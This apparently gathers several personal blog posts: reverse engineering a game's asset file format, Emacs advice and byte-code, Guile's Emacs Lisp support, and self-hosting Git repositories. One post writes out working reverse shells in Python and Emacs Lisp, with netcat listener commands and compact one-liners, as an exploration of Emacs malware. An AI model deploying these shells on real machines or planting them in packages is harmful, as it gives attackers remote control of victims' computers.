My relationship with games is complicated. I never had the chance to
get good at them, and few of the ones I’ve played were any good
either. Despite that, I’ve always had the urge both to complete games
and to discover how they work internally. As nearly all commercially
developed games happen to be proprietary, I focused on viewing and
extracting their asset files, an art not unlike the reverse
engineering of executable files.
Fast-forward many years and I still occasionally play games. At least
I have proper tools at hand now and the knowledge to make sense of
binary formats. Another plus is that people have come to discover the
benefits of the open source spirit to collaborate and share their
knowledge online. Recently I’ve taken a closer look at a certain meme
game in my Steam library. Many of its assets (music, sound effects,
fonts and a single texture) are stored as regular files on disk.
However, there’s a 79M asset file, presumably holding the missing
textures for the game sprites and backgrounds. This blog post will
explore its custom format and inner workings in enough detail to write
your own extraction program.
For starters I opened the file in my favorite hex editor and browsed
through it, looking for obvious patterns such as
human-readable strings, repetitive byte sequences and anything not
looking like random noise. I’ve found the following:
- A very short header that doesn’t contain any human-readable file
signature.
- Several file paths, each terminated with a null byte.
- Several 16-byte entries, with columns lining up almost perfectly.
- Several concatenated files, identified by file signatures for the
WebP, PNG and XML formats.
Here are some screenshots, with the relevant patterns highlighted:
Header and paths section:
Mysterious 16-byte entries, with many even-numbered columns being
zero:
WebP file header in files section:
XML file header in files section:
PNG file header in files section:
Given the information so far, several hypotheses can be established:
- The number of paths is the same as the number of embedded files and
every path corresponds to an embedded file.
- The file contains information about how long each embedded file is.
- The mystery section (which I’ll call the index from now on) contains
that information in each of its 16-byte entries.
- Each of these entries corresponds to a path and embedded file.
- The association between path, entry and embedded file is ordered:
for example, the first path corresponds to the first entry and the
first embedded file.
Each hypothesis can be verified with basic arithmetic. The most
fundamental assumptions the format relies upon are the number of
paths, index entries and embedded files being the same, and the length
of each embedded file being stored somewhere else in the file,
presumably the index section. I decided to start with the latter, for
which I picked the first embedded file, a WebP image. Its length
can be determined by taking bytes 4 to 7, decoding them as an
unsigned little-endian 32-bit integer and adding 8 to include the
length of the preceding RIFF header. The obtained length can be verified by
seeking to the beginning of the file in the hex editor, then seeking
by the length and checking whether that position corresponds to
the start of the next file. Likewise, the length of a PNG file can be
obtained by looking for the IEND sequence followed by a 32-bit
checksum and for XML files by looking for the closing tag.
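The WebP length calculation can be sketched in a few lines of Python; `webp_length` is a hypothetical helper, not part of any existing tool:

```python
import struct

def webp_length(data, offset=0):
    # A WebP file is a RIFF container: bytes 4..7 after the offset hold the
    # chunk size as an unsigned little-endian 32-bit integer; adding 8
    # accounts for the "RIFF" magic and the size field itself.
    (size,) = struct.unpack_from("<I", data, offset + 4)
    return size + 8
```

Seeking forward by the returned length from the start of one embedded file should land exactly on the signature of the next one.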
The first file is 2620176 bytes long and is immediately followed by an
XML file describing it. That length corresponds to either 0027fb10 or
10fb2700 when encoded as hex, depending on whether it’s big- or
little-endian. And indeed, the latter value shows up in the last 4
bytes of the first 16-byte entry. I then verified that this property
holds by extracting the file length from the second 16-byte entry and
applying it to the second embedded file.
This left verifying the number of embedded files by counting the
number of paths and entries in their respective sections. I’ve found
335 of them in each, represented as 4f010000 using the previously
encountered little-endian hex notation. That number corresponds to
bytes 4 to 7 in the header, leaving two 4-byte numbers around it. I
haven’t been able to deduce the meaning of the preceding one, but the
succeeding one is a6210000 which corresponds to 8614, the length
of all paths immediately following the file header, thereby giving me
all information necessary to extract the assets.
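The whole extraction can then be sketched as follows. This is my own reconstruction under the assumptions established above (12-byte header of an unknown u32, the file count and the paths-section length; 16-byte index entries with the file length in the last 4 bytes); the names are made up for illustration:

```python
import struct

def extract(data):
    # Header: unknown u32, number of files, total length of the paths section.
    _, count, paths_len = struct.unpack_from("<III", data, 0)
    # Null-terminated paths immediately follow the 12-byte header.
    paths = data[12:12 + paths_len].split(b"\x00")[:count]
    index = 12 + paths_len       # start of the 16-byte index entries
    offset = index + 16 * count  # start of the concatenated embedded files
    files = []
    for i in range(count):
        # Last 4 bytes of each index entry: embedded file length (u32 LE).
        (length,) = struct.unpack_from("<I", data, index + 16 * i + 12)
        files.append((paths[i].decode(), data[offset:offset + length]))
        offset += length
    return files
```

Writing each returned blob to its corresponding path is all that’s left for a complete extraction program.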
Performing the analysis and writing the extraction program took me a
few hours. It could have been a lot trickier, especially if my goal
was to perform game modding. That would require extracting the files,
modifying them, then repacking them into the asset file without the
game noticing a change. To do this safely, it’s necessary to perform
deeper analysis of the unknown fields, for example by looking into
other matching metadata of every embedded file or by reverse
engineering the game itself.
Another common problem is that data doesn’t always form clear
patterns, for example if it’s encrypted, compressed or random-looking
for other reasons. Sometimes formats are optimized towards programmer
convenience and may store data necessary to verify the asset file
inside the game instead. This would again not pose a challenge to a
reverse engineer, but would still complicate automatic extraction.
Sometimes teamwork is necessary. Chances are that tools have already
been developed for popular games and may only need minor adjustments
to get them working again. One resource I’ve found immensely helpful
for gaining a
better understanding of common patterns is The Definitive Guide To
Exploring File Formats.
Update: Added a helpful link explaining more opcodes.
Note: This is an expanded version of this Reddit post.
Advice is one of those Emacs Lisp features that you don’t see often in
other programming languages. It enables you to extend almost any
function you’d like by executing code before/after/instead of it and
messing with its arguments and return values. But how does it work?
And which of the two implementations should you use?
Somewhat surprisingly, advice.el consists of more than 3000 lines,
but more than half of them are comments. It doesn’t quite reach
literate-programming levels of commentary, but it explains its
internals and includes a small tutorial demonstrating how it works.
There are many
bells and whistles, but to keep things simple I’ll focus on the part
of the tutorial that changes a function to manipulate its argument
before execution of the function body. That body can be
programmatically obtained using symbol-function:
(defun foo (x)
  "Add 1 to X."
  (1+ x))

(symbol-function 'foo)
;; => (lambda (x) "Add 1 to X." (1+ x))
The example advice fg-add2 adds one to x again before the
actual code is run:
(defadvice foo (before fg-add2 first)
  "Add 2 to X."
  (setq x (1+ x)))

(symbol-function 'foo)
;; #[128 "<bytecode>"
;;   [apply ad-Advice-foo (lambda (x) "Add 1 to X." (1+ x)) nil]
;;   5 nil]
Yikes. How does one make sense of the byte-code?
Interlude: Byte-code disassembly
Emacs Lisp contains two interpreters: a tree walker (takes an
s-expression as input, walks along it and evaluates the branches) and
a byte-code interpreter (takes byte-code, interprets it using a stack
VM).
bytecomp.el and byte-opt.el transform s-expressions into
optimized byte-code. I can recommend studying these to understand how
a simple compiler works. The result of this is code expressed in a
stack-oriented fashion using up to 256 fundamental operations.
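To get a feel for what such a stack VM does, here is a toy interpreter for a hypothetical four-opcode subset. It mirrors the semantics of the opcodes shown in the disassemblies below, but is in no way Emacs’s actual implementation:

```python
def run(code, consts, env):
    # Minimal stack machine: each instruction is an (opcode, argument) pair.
    stack = []
    for op, arg in code:
        if op == "constant":    # push a value from the constant vector
            stack.append(consts[arg])
        elif op == "varref":    # push the current value of a variable
            stack.append(env[arg])
        elif op == "call":      # pop N args plus a function, push the result
            args = [stack.pop() for _ in range(arg)][::-1]
            fn = stack.pop()
            stack.append(fn(*args))
        elif op == "return":    # return the top of the stack
            return stack.pop()
```

For example, `run([("constant", 0), ("constant", 1), ("varref", "a"), ("call", 2), ("return", None)], [max, 10], {"a": 7})` has the same shape as the function-call disassembly shown further down.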
One can look at it with the disassemble function, which accepts
both function symbols and function definitions:
(disassemble (lambda () 1))
;; byte code:
;; args: nil
;; 0 constant 1
;; 1 return
What happens here is that the constant 1 is pushed to the stack, then
the top of the stack is returned. Arguments are treated in a similar
fashion:
(disassemble (lambda (x) x))
;; byte code:
;; args: (x)
;; 0 varref x
;; 1 return
Instead of putting a constant on the stack, the value of x is looked
up and pushed to the stack. Finally, a simple function call looks as
follows:
(disassemble (lambda (a b) (message "%S: %S" a b)))
;; byte code:
;; args: (a b)
;; 0 constant message
;; 1 constant "%S: %S"
;; 2 varref a
;; 3 varref b
;; 4 call 3
;; 5 return
Four values are pushed on the stack in function call order, then a
function is called with three arguments. The four stack values are
replaced with its result, then returned. We’re almost ready to tackle
the actually interesting disassembly now and can look up all other
unknown opcodes in this unofficial manual.
You may wonder though, why bother? Why not just use a decompiler?
Or even avoid dealing with byte-compiled code in the first place…
It turns out there are a few good reasons:
- Ideally you’d always have access to source code, but that is not
always an option. For example, it’s not unheard of for an Emacs
installation to ship only byte-compiled sources (hello, Debian).
Likewise, defining advice as above will byte-compile the function.
Byte-code compilation is done as a performance enhancement, and
backtraces from optimized functions will contain byte-code.
- The byte-code decompiler we have is clunky and incomplete. It
sometimes fails to make sense of byte-code, meaning you cannot rely
on it. Another thing to consider is that byte-code doesn’t have to
originate from the official byte-code compiler; there are other
projects generating byte-code that the decompiler may not support.
Should someone want to thwart analysis of (presumably malicious) code,
hand-written byte-code would be an option.
- Sometimes byte-code is studied to understand the performance of an
Emacs Lisp function. It’s easier to reason about byte-code than
regular code, especially to see the effects of lexical binding.
- It’s educational to wade through bytecode.c and other Emacs
internals. While there isn’t much direct benefit in understanding
Emacs byte-code, the same lessons apply to other stack-oriented VMs,
such as the JVM. Learning this makes reversing proprietary programs
targeting the JVM (such as Android apps) much easier and enables
advanced techniques such as binary patching.
On advice.el (continued)
We’re ready to unravel what foo does:
;; byte code for foo:
;; args: (x)
;; 0 constant apply
;; 1 constant ad-Advice-foo
;; 2 constant (lambda (x) "Add 1 to X." (1+ x))
;; 3 stack-ref 3
;; 4 call 3
;; 5 return
apply, ad-Advice-foo and a lambda are placed on the stack.
Then stack element 3 (zero-indexed) is pushed on top of the stack. We
already know that elements 0, 1 and 2 are the three constants; element
3, however, is the first argument passed to the function. As it turns
out, when lexical binding is enabled, the stack-ref opcode is used
instead of varref. Therefore the byte-code presented is
equivalent to (lambda (&rest arg) (apply 'ad-Advice-foo (lambda (x)
"Add 1 to X." (1+ x)) arg)). You can verify this by disassembling that
lambda and comparing the output with the previous disassembly.
What does ad-Advice-foo do though?
;; byte code for ad-Advice-foo:
;; args: (ad--addoit-function x)
;; 0 constant nil
;; 1 varbind ad-return-value
;; 2 varref x
;; 3 add1
;; 4 varset x
;; 5 varref ad--addoit-function
;; 6 varref x
;; 7 call 1
;; 8 dup
;; 9 varset ad-return-value
;; 10 unbind 1
;; 11 return
This is a bit more to unravel. varbind introduces a temporary
variable, unbind undoes this binding, varset is equivalent to
set and dup pushes a copy of top of stack (kind of like
stack-ref 0 would do). The sequence of constant nil and
varbind ad-return-value is the same as (let ((ad-return-value
nil)) ...). x is retrieved, incremented by 1 and x set to
the result of that, therefore (setq x (1+ x)). Then
ad--addoit-function is called with x as argument. The result
of that is duplicated and ad-return-value is set to it. Finally
one binding is undone by unbind 1, namely the temporary variable.
Therefore
the byte-code is equivalent to (let (ad-return-value) (setq x (1+
x)) (setq ad-return-value (funcall ad--addoit-function x))). Let’s
see how nadvice.el fares.
It’s tiny compared to advice.el, at only 391 lines of code. To
nobody’s surprise it lacks bells and whistles such as changing
argument values directly or deferring advice activation.
Therefore some adjustments are required to create the equivalent
advice with it:
(defun foo-advice (args)
(mapcar '1+ args))
(advice-add 'foo :filter-args 'foo-advice)
;; #[128 "<bytecode>" [apply foo-advice (lambda (x) "Add 1 to X." (1+ x)) nil] 5 nil]
;; byte code for foo:
;; args: (x)
;; 0 constant apply
;; 1 constant (lambda (x) "Add 1 to X." (1+ x))
;; 2 constant foo-advice
;; 3 stack-ref 3
;; 4 call 1
;; 5 call 2
;; 6 return
We have our three constants and x on the stack. At first a
function is called with one argument, that would be foo-advice
with x (which represents the argument list). Then a function is
called with two arguments, that is apply with the lambda and the
result of the previous function call. In other words, (lambda
(&rest x) (apply (lambda (x) "Add 1 to X." (1+ x)) (foo-advice x))).
It was a bit less convenient to write, but far easier to understand.
nadvice.el is surprisingly elegant, striking a good balance
between amount of overall features and technical simplicity. Unless
you maintain a package that must keep compatibility with Emacs 24.3 or
earlier, I don’t see a good reason to go for advice.el.
Every now and then there’s someone asking about Emacs and security,
especially when it comes to the question whether one can trust
packages. Short answer: No. Long answer: This question cannot be
answered without defining a threat model first, but honestly, who is
going to bother backdooring an Emacs package?
Yet some lingering doubt remains. There are Emacs users after all who
are high-profile enough to bother attacking. Suppose you wanted to
write malware in Emacs Lisp; one obvious thing to try after gaining
the ability to execute arbitrary code is a remote shell, to
comfortably execute commands on someone else’s computer. There are
two flavors of them:
- Bind shell: The victim computer listens on LPORT and the attacker
  connects to LHOST:LPORT. Any user input from the attacker is sent
  to a local shell; output from that shell is returned to the
  attacker.
- Reverse shell: The victim computer establishes a connection to the
  attacker listening at RHOST:RPORT. Much like with the bind shell,
  user input from the attacker is interpreted by a local shell.
Reverse shells are more popular as they allow circumventing
restrictive firewall rules. There are several cheatsheets for
spawning them with a Bash/Python/Ruby/Perl/… oneliner, most of those
rely on creating a socket, extracting its file descriptor and wiring
it up to a shell process. Unfortunately Emacs doesn’t give you that
information, so I’ve had to settle for a less elegant approach.
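For contrast, here is the fd-wiring trick those cheatsheet oneliners rely on, sketched in Python (host and port are placeholders); this is exactly the approach Emacs Lisp cannot take, since its process API hides the socket’s file descriptor:

```python
import socket
import subprocess

def reverse_shell(host, port):
    # Connect back to the attacker's listener, then hand the socket's file
    # descriptor to a shell as stdin/stdout/stderr -- the wiring that the
    # Bash/Python/Ruby/Perl oneliners perform.
    s = socket.socket()
    s.connect((host, port))
    fd = s.fileno()
    subprocess.call(["sh", "-i"], stdin=fd, stdout=fd, stderr=fd)
    s.close()
```

With a listener such as `nc -nlvp 8080` running, calling `reverse_shell("127.0.0.1", 8080)` hands the attacker an interactive shell.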
Here’s my first attempt using shell-command-to-string to execute
the received process output and process-send-string to send it
back to the process:
(let ((r (make-network-process :name "r"
                               :host "127.0.0.1"
                               :service 8080)))
  (set-process-filter r (lambda (p s)
                          (process-send-string p (shell-command-to-string s))))
  (read-char))
To test it, launch nc -nlvp 8080 (for GNU netcat) or nc -nlv
8080 (for BSD netcat), save the above to test.el and run
emacs --script test.el. It works, but is sub-optimal for a few
reasons:
- A new shell is spawned every time a batch of user input has been
read. Due to this, changing the directory doesn’t appear to have any
effect.
- The shell seems unresponsive when executing commands generating
large output (for example find /) as shell-command-to-string
collects everything before returning the entirety of it.
- If the chunk of user input received by the process filter doesn’t
resemble a valid shell command (for example by being broken up at an
inconvenient spot), it won’t be executed as expected and might raise
an incomprehensible error.
To fix these issues a dedicated shell subprocess needs to be created.
Output from the network process is sent to the shell subprocess and
vice versa. This makes for slightly longer code:
(let ((r (make-network-process :name "r"
                               :host "127.0.0.1"
                               :service 8080))
      (c (start-process "s" nil "sh" "-i")))
  (set-process-filter r (lambda (_ s) (process-send-string c s)))
  (set-process-filter c (lambda (_ s) (process-send-string r s)))
  (read-char))
Voila, cd works as expected and the hangs for find / are gone
as well. Time to optimize both into shell oneliners; for that I
eliminate whitespace and carefully adjust the logic:
emacs --batch --eval '(set-process-filter(make-network-process :name"r":host"127.0.0.1":service 8080)(lambda(p s)(process-send-string p (shell-command-to-string s))))' -f read-char
emacs --batch --eval '(progn(setq r(make-network-process :name"r":host"127.0.0.1":service 8080)c(start-process"s"nil"sh""-i"))(set-process-filter r(lambda(_ x)(process-send-string c x)))(set-process-filter c(lambda(_ x)(process-send-string r x))))' -f read-char
These clock in at 180 and 261 chars respectively. Not too shabby
compared to the usual Python/Ruby/Perl oneliners (243/104/216
chars). Unlike them though I cannot upgrade the reverse shell to a
fully interactive one. But who knows, maybe they’ll come in useful
some day if I ever encounter a machine not having common programming
languages installed, but Emacs for some reason…
Update: Factual corrections to Robin Templeton’s work.
Update: Added an extra set of benchmarks for Guile 3 in a Debian
Sid Docker container.
Disclaimer: I don’t use Guile. I hardly know it. There are other
Scheme implementations I know far better. But since Guile Emacs is a
hot topic with many hopes and unproven claims attached to it, I
experiment with it every now and then. All “benchmark” results here
are to be taken with
caution, they’ve been created using Guile 2.2.6 and Emacs 26.3 on a
Thinkpad X230t running Arch Linux.
With that out of the way, laurus from #emacs reminded me
that one of the reasons why Guile Emacs was possible in the first
place is Guile’s language tower, with Emacs Lisp being one of the
supported languages. But what does that mean? How complete is the
Emacs Lisp support? What can it be used for? These and a few other
questions are the topic of this blog post.
In need of a spec
Standardized programming languages have the great benefit of being
based on a specification one can consult whenever in doubt of how
things are supposed to behave. This allows several competing
implementations to be developed, with their own unique strengths and
benefits. If you adhere to the standard, switching between
implementations isn’t hard and can help shake out bugs, for example
when compiling your C programs with different compilers.
Things get considerably harder if your chosen language forgoes this
approach and correct behavior is defined by the reference
implementation, yet this didn’t stop people from writing alternative
implementations of programming languages such as Python and Ruby.
Emacs Lisp got into a similar situation once Guile was extended to the
degree of supporting Emacs Lisp as an additional language. Provided
your version of Guile is new enough, you can evaluate trivial code in
its REPL:
scheme@(guile-user)> (define foo 1)
$1 = 1
scheme@(guile-user)> ,L elisp
Happy hacking with Emacs Lisp! To switch back, type `,L scheme'.
elisp@(guile-user)> (defvar bar 2)
$2 = bar
elisp@(guile-user)> bar
$3 = 2
So far so good. But how much of Emacs Lisp is supported? Not much
apparently, many common functions like message and error are
unbound. It doesn’t seem possible to do anything with buffers or
files either. This greatly limits the possibilities of writing useful
scripts in Emacs Lisp. One way of determining what exactly is
supported would be consulting the source code, but where’s the fun in
that when you could instead test it programmatically, thereby creating
an executable spec…
Generating the spec
The usual test approaches fail me. Reading test inputs via stdin with
read-string? Accessing the arguments with argv? Reading from
a file with insert-file-contents? Obtaining an environment
variable with getenv? None of that is supported. At least you
can print to stdout with princ. So I went for a slightly different
approach: obtain a list of functions/variables in a minimal Emacs
environment, then generate a test file that checks their existence and
prints a test summary. Here’s the code generation script:
(defun printf (fmt &rest args)
(princ (apply 'format fmt args)))
(printf ";; elisp spec adherence test
(defvar passed 0)
(defvar failed 0)
(defun test-sym (pred sym)
(if (funcall pred sym)
(setq passed (1+ passed))
(setq failed (1+ failed))))
(defun test-fun (sym) (test-sym 'fboundp sym))
(defun test-var (sym) (test-sym 'boundp sym))\n\n")
(mapatoms
 (lambda (atom)
   (when (fboundp atom)
     (printf "(test-fun '%S)\n" atom))
   (when (and (not (keywordp atom)) (boundp atom))
     (printf "(test-var '%S)\n" atom))))
(printf "(princ \"Passed: \")\n")
(printf "(princ passed)\n")
(printf "(princ \"Failed: \")\n")
(printf "(princ failed)\n")
Assuming it’s been saved as gen-elisp-spec.el, the executable spec
itself is generated with emacs -Q --batch --script gen-elisp-spec.el
> elisp-spec.el. Here’s a test session using Emacs and Guile:
[wasa@box ~]$ time emacs -Q --batch --script elisp-spec.el
emacs -Q --batch --script elisp-spec.el 0.10s user 0.02s system 99% cpu 0.117 total
[wasa@box ~]$ time guile --language=elisp elisp-spec.el
guile --language=elisp elisp-spec.el 77.62s user 0.27s system 103% cpu 1:15.04 total
This is kind of surprising. I didn’t expect Emacs to fail its own
test and didn’t expect Guile to implement this little either. Most
surprising is the abysmal speed of the Guile run; I’m looking forward
to anyone being able to explain that part to me. Here’s one more test
using the official Debian Sid Docker image with Emacs 26.3 and Guile
3:
root@d27668492764:/# time emacs -Q --batch --script elisp-spec.el
root@d27668492764:/# time guile --language=elisp elisp-spec.el
This is not exactly an improvement. At least the numbers are small
enough to print out the offending symbols, for Emacs it’s atom and
printf (which polluted the test environment), for Guile I’ve taken
the liberty of annotating the list:
lambda apply funcall
eval load eval-and-compile eval-when-compile
aref aset make-vector nth
progn prog2 prog1
;; control flow
if when unless cond
or and not
;; explicit nonlocal exit
signal condition-case unwind-protect
prin1-to-string print princ send-string-to-terminal terpri
car cdr caar cadr cdar cddr
member memql memq
;; destructive list processing
nreverse setcar setcdr rplaca rplacd
;; other list processing
cons list make-list `
defconst defvar defun defmacro
fset set setq setplist
symbol-function symbol-name symbol-plist symbol-value
string string-match substring
zerop floatp stringp numberp integerp wholenump
boundp fboundp functionp symbolp
consp listp nlistp
fceiling ffloor ftruncate fround float
> < >= <= /= =
eq eql equal
;; numerical operators
+ - * %
Some notable omissions and differences:
- No division. Most likely incompatible with Scheme’s numeric tower.
- Input is read with read-from-minibuffer, not read-string.
- send-string-to-terminal is unusual to have, but most likely the
primitive output function.
- string-match is nice to have, but of limited use without
match-data accessors.
- prin1-to-string exists, prin1 doesn’t.
- print doesn’t add newlines and behaves like prin1 should.
To do anything outside of textbook exercises you’d need to define
extra primitives. Guile’s module/language/elisp/boot.el shows how
to apply a band-aid on some of the previous shortcomings:
(fset '/ (@ (guile) /))
(fset 'read-string 'read-from-minibuffer)
(fset 'prin1 (@ (guile) write))
(defun print (object) (prin1 object) (terpri))
You could write more of it to reach the goal of using Emacs Lisp as a
scripting language outside of Emacs, but you’d need to write Scheme to
get there. Why not just use Scheme? Why invent a new runtime? It
amounts to rebuilding an existing engine, except with a far weaker
sales-pitch.
What does this mean for Guile Emacs?
What I’ve shown above is barely sufficient to bootstrap an Emacs on
top of it. Guile Emacs requires a customized version of Guile and
Emacs, then loads up the supporting Emacs Lisp files to do the rest.
There are more incompatibilities, like called-interactively-p
being stubbed out. Extending the presented rudimentary spec to
contain actual tests would help with tracking progress and usability.
It might even improve the overall quality of GNU Emacs itself,
provided that the core developers are on board and believe in the
idea. I’ve briefly searched emacs-devel for previous discussion on
the topic, but only found bikeshedding about Guile Emacs itself;
anyone who feels strongly about the subject should feel free to start
a discussion there.
With regards to Guile Emacs itself, the situation is trickier. The
above repositories have not been touched for five years, with Robin
Templeton being the sole contributor for five Google Summer of Code
events. Even though the work is far from complete, it is impressive
what a college student managed to do under supervision of Guile’s
maintainer Andy Wingo and Ludovic Courtès. Further advancements
require similarly motivated individuals to participate in the Guile
community and become part of the effort, much like with other free
software projects. It’s tempting to take a shortcut like donating to
other developers, but unless they’ve figured out a way of converting
that money into equivalent work, there will be little connection
between what you give away and what they do in return. This again is
a topic worth discussing, preferably with the people who can make a
difference.
I’m sorry for the dramatic title. Note that I won’t delete my GitHub
account or stop using it; there are plenty of projects hosted there
that I
contribute to. This blog post is about my experience with hosting my
personal projects on GitHub and why I stopped doing that.
What’s wrong with GitHub?
It depends on who you ask. There’s a lot going for GitHub:
- Pretty Git repo viewer with integrated issue tracker, wiki and more.
- Many projects chose it as their home.
- Lots of convenience features.
- Highly reliable hosting.
- Social network effects.
On the other hand there’s a few reasons not to use it:
- Don’t put all your eggs into one basket.
- Slow and unreliable at times.
- Owned by Microsoft now.
- Proprietary SaaS.
All of these are good and important points, but they’re unrelated to
my move to self-hosting. Over time I’ve come to dislike the workflow
GitHub helped popularize:
- Sign up if you haven’t already
- Fork repository in Browser
- Clone forked repository
- Create new branch
- Perform changes on that branch
- Push branch
- Click on “Create pull request” button
- Describe changes and overall motivation
Some projects required an email-driven workflow, for example by virtue
of not being hosted on GitHub and only offering the committer’s email
address as contact option:
- Clone repository
- Perform changes
- Format patch
- Write an email with the patch attached, describing changes and
overall motivation
If you’re feeling fancy, you can even set up Git to handle emails for
you and combine the last two steps into one. I haven’t done that yet;
https://git-send-email.io/ provides a simple tutorial for it
explaining the finer details.
I’ve come to enjoy this process considerably more, mostly because it
doesn’t waste my time on needless Git operations. Another nice side
effect is that one takes more time composing an email, resulting in a
higher-quality conversation with the other project.
Similarly, there’s other workflows where public discussion on GitHub
is not an option, for example when reporting security issues to a
project. In this case it’s common for the project to provide an email
address and GPG key for secure communication.
On issue trackers
GitHub’s issue tracker is clean and tidy. It may not be as well
suited for large projects, user support or discussing matters beyond
bug reports, but that didn’t stop people from using it for all these
things. Sometimes they’ll go as far as asking other projects to use
GitHub just for that one feature.
I have a completely different problem with it though. Looking back at
the timeline between an issue being opened and closed, they tend to
either follow the pattern of being resolved quickly (anywhere between
a few hours and up to a week) or staying open for a long time,
sometimes up to years. Another such pattern is that development
activity for my projects tends to start with an initial burst of up to
a month, followed by silence and occasional bugfixes. As soon as a
project has reached “good enough” or even “finished” status, chances
are that I won’t do any further development on it. Seeing a repository
with
many open issues makes me unhappy, especially if there’s nothing I can
do about it in the short-term. I’ve seen other projects automating
their issue tracker grooming by closing issues without recent
activity, but it feels dishonest to me and like sweeping the problem
under the rug.
For this reason I’ve decided to go with a different approach,
following the strategy I’ve come up with for bugs involving
attachments that may not be shared publicly for legal reasons:
Send me an email and make sure to include the attachment. Whenever I
receive an email, I make sure to reply to it, this goes back and forth
until a conclusion has been reached (or the issue reporter stops
bothering). This worked surprisingly well so far and integrates
seamlessly into my inbox zero workflow.
A stupid Git viewer
There is no shortage when it comes to self-hostable Git viewers, but
most of them are a tad too social for my needs, with Sourcehut being
the closest match. Another issue for me is security, if I can avoid
it I’d rather not run software with a history of security issues.
After lots of pondering I decided to build a tool for administering
Git repositories and generating a static website, satisfying the
following requirements:
- Generate tarballs for all tags
- Provide a raw view of files
- Provide a file listing
- Render READMEs
This excludes a lot of convenience features like browsing the Git
history, other branches, syntax highlighting, search and so on.
For those you need to clone the repo and perform the operations
locally. This is what I end up doing anyway when searching a
repository and doing more serious work. Another bonus of this
strategy is having a full copy of the project at hand, which means no
more need for a fork button.
My main inspiration design-wise is Evan Hanson’s Git site. The
Linux Git User Manual helped me figure out how to set up Git to
pull via HTTPS and push via SSH. Serving a Git repo via HTTPS
requires enabling the example post-update hook; to regenerate the
files and tarballs, a post-receive hook is used. Only a handful of
Git commands were necessary for the remaining operations:
- git init: Initialize (bare) repository
- git cat-file: Obtain contents of file
- git update-server-info: Update files for serving via HTTPS
- git ls-tree: Display (full) file tree with metadata
- git archive: Create release tarballs
- git tag: Display tags for release tarballs
This leaves some advanced nginx config. Normally serving a statically
generated site is simple, but in this case I want index pages to be
served as HTML (using text/html as mimetype) and raw files as
plain text (using text/plain as mimetype). Not all raw files
though, images, videos and more should still be served with the
appropriate mimetype. This took some headscratching and
experimentation, but I eventually figured it all out and can fully
recommend nginx beyond its traditional role as a ridiculously fast
HTTP server with great reverse-proxying support.
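The mimetype juggling ended up looking roughly like the following fragment. This is a hedged sketch, not my actual configuration: the server name and root are placeholders, and the exact locations will differ per setup. The idea is that directory indexes stay HTML, everything else defaults to text/plain, and a types override re-adds the mimetypes that must survive for images and videos:

```nginx
server {
    listen 80;
    server_name git.example.com;  # placeholder
    root /srv/git-site;           # placeholder

    # Generated index pages should be served as HTML.
    location ~ /$ {
        index index.html;
    }

    # Raw files default to text/plain so the browser displays them,
    # while genuinely binary formats keep a sensible mimetype.
    location / {
        default_type text/plain;
        types {
            text/html         html;
            image/png         png;
            image/jpeg        jpg jpeg;
            image/gif         gif;
            video/mp4         mp4;
            application/gzip  gz;
        }
    }
}
```

The trick is that a local `types` block completely replaces the inherited mapping, so only the listed extensions escape the `default_type` fallback.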
You can find my repositories over at https://depp.brause.cc, with
the main repository powering this on https://depp.brause.cc/depp
and some auxiliary tools like git-export (convert existing
repository to self-hosted one) and git-depp (perform maintenance
operations in a local repo on the remote server, like regenerating
static files).
I’ve successfully migrated all repositories I own and continue
maintaining from GitHub. Some of them are pulled in by the MELPA
repository and CHICKEN’s egg system. I’ve put up a basic FAQ
for contributors and am curious to see whether they’ll bother
contributing or whether there will instead be forks of the archived
repositories on GitHub.